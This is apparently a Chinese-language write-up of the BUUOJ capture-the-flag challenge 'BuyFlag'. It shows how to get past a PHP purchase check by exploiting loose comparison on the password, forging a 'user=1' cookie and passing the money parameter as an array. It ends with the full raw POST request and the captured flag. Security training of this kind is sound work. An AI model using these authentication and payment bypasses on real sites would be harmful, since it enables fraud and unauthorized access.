[極客大挑戰 2019]BuyFlag 1
開啟例項發現pay.php頁面,有提示資訊
開啟原始碼發現password post提交邏輯
burpsuite抓包傳參,傳入money和password引數,這裡password是==弱比較,所以加個字元就可以繞過
password=404a&money=100000000
回顯發現並沒有變化
注意到學生需要CUIT(Only Cuit's students can buy the FLAG)
嘗試修改頭資訊,將cookie驗證修改為1(0 false,1 ture)
成功繞過身份驗證(我這邊bp不知道為啥一直提示password傳不過去),所以我換了hacker bar提交;這邊顯示密碼正確,身份驗證也對了,但是money錯誤,懷疑是長度問題。(you have not enough money,loser~)
採用陣列繞過,成功獲得flag
password=404a&money[]=100000000
flag{46a2d632-843d-41bf-9a8a-42aac15baf18}
最終payload
POST /pay.php HTTP/1.1
Host: 8cb0e35d-dad9-4a41-86ca-b4cfdf800dd8.node5.buuoj.cn:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 35
Origin: http://8cb0e35d-dad9-4a41-86ca-b4cfdf800dd8.node5.buuoj.cn:81
Connection: keep-alive
Referer: http://8cb0e35d-dad9-4a41-86ca-b4cfdf800dd8.node5.buuoj.cn:81/pay.php
Cookie: user=1
Upgrade-Insecure-Requests: 1
Priority: u=0, i
password=404a&money[]=100000000